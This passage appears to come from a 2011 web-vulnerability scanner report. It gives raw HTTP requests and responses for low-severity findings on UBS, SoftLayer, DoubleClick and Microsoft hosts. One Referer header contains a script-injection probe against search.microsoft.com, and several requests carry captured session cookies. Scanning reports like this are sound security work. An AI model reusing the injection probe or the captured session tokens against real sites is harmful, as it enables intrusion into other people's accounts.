Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:01 GMT
Server: Apache
Last-Modified: Tue, 02 Jun 2009 16:03:46 GMT
ETag: "84058b-e36-b0049c80"
Accept-Ranges: bytes
Content-Length: 3638
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

..............h...&... ..............(....... ...........@...................................558.............    .......0/3.............325.........................326...................................
...[SNIP]...

22.10. https://manage.softlayer.com/index/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /index/index

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...

22.11. https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nae.ubs.com
Path:   /app/RKC/1/ACEUrlDispatcherWeb/Dispatch

Request

GET /app/RKC/1/ACEUrlDispatcherWeb/Dispatch HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=UTF-8
age: 2
date: Wed, 06 Jul 2011 14:08:23 GMT
content-length: 5743
content-language: en
server: Proxy/1.0
connection: close
x-old-content-length: 5743

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>UBS Login</title>

<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

22.12. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nae.ubs.com
Path:   /cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

Request

GET /cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instruments?locale=en_US HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Referer: https://nae.ubs.com/quotes/markets_instruments?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=UTF-8
date: Wed, 06 Jul 2011 13:54:58 GMT
content-language: en
server: Proxy/1.0
x-old-content-length: 5927
Content-Length: 5927

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>UBS Login</title>

<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

22.13. https://nae.ubs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nae.ubs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/plain
date: Wed, 06 Jul 2011 13:54:58 GMT
content-length: 224
last-modified: Thu, 10 Aug 2006 11:13:01 GMT

GIF89a.......___..................OOO......ooo///...???...................................................!.......,..........]`$.di.h....8...A$...4..A....0.x.........o... .(.rX."..B.t....1RX...G-1.
...[SNIP]...

22.14. https://onesource.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onesource.ubs.com
Path:   /

Request

GET / HTTP/1.1
Host: onesource.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 06 Jul 2011 14:08:16 GMT
Content-length: 10173
Content-type: text/html
Etag: "94d76da3-3-0-27bd"
Last-modified: Sun, 19 Jun 2011 19:32:07 GMT
Accept-ranges: bytes
Connection: close

<!--
File name: internet\index.html
-->
<HTML>
<HEAD>
<TITLE>Missing Ticker Error Page</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="styles/styles_rdsgn.css">
</HEAD>

<BODY>
<TABLE BORDER=
...[SNIP]...

22.15. https://onlineservices.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /

Request

GET / HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-length: 3494
content-type: text/html
date: Wed, 06 Jul 2011 14:08:13 GMT
last-modified: Fri, 27 Mar 2009 02:29:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<!-- Copyright (C) 2000 Tivoli Systems, Inc. -->
<!-- Copyright (C) 1999 IBM Corporation -->
<!-- Copyright (C) 1998 Dascom, Inc. -->
<!-- All Rights Res
...[SNIP]...

22.16. https://onlineservices.ubs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981879305:ss=1309981804815

Response

HTTP/1.1 200 OK
content-length: 0
content-type: text/plain
date: Wed, 06 Jul 2011 13:51:30 GMT
last-modified: Fri, 26 Oct 2007 14:14:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


22.17. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/lo

Request

GET /olsauth/ex/pbl/lo HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:01 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

22.18. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dfp

Request

GET /olsauth/ex/pbl/ubso/dfp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:07:59 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

22.19. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dfu

Request

GET /olsauth/ex/pbl/ubso/dfu HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Referer: https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:52:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 28205


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

22.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dl

Request

GET /olsauth/ex/pbl/ubso/dl HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981866345:ss=1309981804815

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:51:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 32341


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

22.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/pfu

Request

GET /olsauth/ex/pbl/ubso/pfu HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

22.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/pl

Request

GET /olsauth/ex/pbl/ubso/pl HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

22.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/_security.jsp

Request

GET /olsauth/public/SE/OLS/_security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:10 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>UBS Financial Services Security Statement</title>
   </head>

   <body leftma
...[SNIP]...

22.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/customerPrivacy37.jsp

Request

GET /olsauth/public/SE/OLS/customerPrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
<HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   
</HEAD>


<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="
...[SNIP]...

22.25. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/importantLegalInformation.jsp

Request

GET /olsauth/public/SE/OLS/importantLegalInformation.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:11 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwid
...[SNIP]...

22.26. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

Request

GET /olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwid
...[SNIP]...

22.27. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/onlinePrivacy37.jsp

Request

GET /olsauth/public/SE/OLS/onlinePrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>    
   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       
   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" lin
...[SNIP]...

22.28. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/privacyStatement37.jsp

Request

GET /olsauth/public/SE/OLS/privacyStatement37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">        
       
   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"
...[SNIP]...

22.29. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/security.jsp

Request

GET /olsauth/public/SE/OLS/security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>UBS Financial Services Security Statement</title>
   </head>

   <body leftma
...[SNIP]...

22.30. https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

Request

GET /staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 956266
content-type: application/pdf
date: Wed, 06 Jul 2011 14:08:14 GMT
etag: "e976a-4bbf4038"
last-modified: Fri, 09 Apr 2010 14:56:56 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

%PDF-1.4%....
106 0 obj<</Linearized 1/L 956266/O 108/E 562847/N 23/T 954103/H [ 816 1207]>>endobj xref106 260000000016 00000 n
0000002023 00000 n
0000002124 00000 n
0000002530 0
...[SNIP]...

22.31. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /staticfiles/olspages/documents/viewPrint.html

Request

GET /staticfiles/olspages/documents/viewPrint.html HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-type: text/html
date: Wed, 06 Jul 2011 14:08:13 GMT
etag: "8001-4dfa7d49"
last-modified: Thu, 16 Jun 2011 22:01:45 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 32769

<html>    
   <HEAD>    
   <LINK href="https://onlineservices.ubs.com/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   <SCRIPT language=javascript
...[SNIP]...

22.32. https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /staticfiles/pws/adobe/StatementofFinancialCondition.pdf

Request

GET /staticfiles/pws/adobe/StatementofFinancialCondition.pdf HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 480347
content-type: application/pdf
date: Wed, 06 Jul 2011 14:08:15 GMT
etag: "7545b-4d779b69"
last-modified: Wed, 09 Mar 2011 15:23:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

%PDF-1.4%....
1754 0 obj<</Linearized 1/L 480347/O 1756/E 45269/N 22/T 479697/H [ 488 541]>>endobj
1767 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<51AC7FE8
...[SNIP]...

23. HTML does not specify charset
There are 14 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:55:05 GMT
Expires: Wed, 06 Jul 2011 11:55:05 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...

23.2. http://analytics.microsoft.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.microsoft.com
Path:   /Sync.html

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef1d3c6b4585=1
Cookie: A=I&I=AxUFAAAAAABeBwAAdiWT9utCiviB3HCxuYLMlg!!&M=1; MC1=GUID=da1fbe1efa0ae044924b597eae0c35af&HASH=1ebe&LV=20116&V=3; omniID=1308621908165_e848_1389_f5bb_98e500b1fd19; WT_FPC=id=173.193.214.243-2855267600.30158775:lv=1308648584991:ss=1308648377209; WT_NVR_RU=0=technet:1=:2=; msdn=L=1033; s_nr=1308622093188; s_vnum=1311214093190%26vn%3D1; _opt_vi_64WS79UG=C78BD0AA-E1D9-4F06-8CD8-1337F190ABC8; MUID=3957719BE8F34A5DA51D204E7E06704A; MSID=Microsoft.CreationDate=06/21/2011 02:08:26&Microsoft.LastVisitDate=06/21/2011 12:29:48&Microsoft.VisitStartDate=06/21/2011 12:26:20&Microsoft.CookieId=2ad2bd8a-437d-4ebd-affe-5214ddd829eb&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0479-3054-8088-8697; stFI=Thu%2C%2021%20Jul%202011%2002%3A08%3A34%20GMT; UserState=Returning=False&LastVisit=06/21/2011 12:29:32&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=ab73286e-0ac2-4078-b206-f36cf569711d&RegUser=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:31 GMT
Accept-Ranges: bytes
ETag: "e94f40652ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 06 Jul 2011 11:25:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
